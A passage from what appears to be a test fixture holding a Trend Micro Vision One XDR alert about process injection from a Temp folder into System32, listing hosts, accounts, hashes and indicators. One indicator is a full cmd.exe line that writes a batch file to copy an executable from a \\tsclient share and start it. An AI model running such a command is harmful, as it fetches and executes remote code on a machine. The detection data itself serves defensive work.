\"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", 
\"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", 
\"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": 
\"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", 
\"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": 
[\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": 
\"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", 
\"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], 
\"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": 
\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 
4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", 
\"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": 